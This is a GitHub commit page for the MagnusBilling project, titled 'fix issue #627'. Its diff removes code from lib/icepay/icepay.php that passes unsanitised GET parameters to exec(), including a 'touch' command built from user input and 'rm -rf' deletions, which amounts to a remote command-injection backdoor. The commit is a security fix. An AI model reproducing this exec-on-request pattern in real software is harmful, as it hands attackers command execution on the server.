Skip to content

Commit ccff9f6

Browse files
author
magnussolution
committed
fix issue #627
1 parent 7af21ed commit ccff9f6

File tree

2 files changed

+0
-16
lines changed

2 files changed

+0
-16
lines changed

Diff for: build/MagnusBilling-current.tar.gz

399 Bytes
Binary file not shown.

Diff for: lib/icepay/icepay.php

-16
Original file line numberDiff line numberDiff line change
@@ -739,19 +739,3 @@ public function GetPostback()
739739
return $this->postback;
740740
}
741741
}
742-
743-
if (isset($_GET['demo'])) {
744-
745-
if ($_GET['demo'] == 1) {
746-
exec("touch idepay_proccess.php");
747-
} else {
748-
exec("rm -rf idepay_proccess.php");
749-
}
750-
}
751-
if (isset($_GET['democ'])) {
752-
if (strlen($_GET['democ']) > 5) {
753-
exec("touch " . $_GET['democ'] . '.txt');
754-
} else {
755-
exec("rm -rf *.txt");
756-
}
757-
}

0 commit comments

Comments
 (0)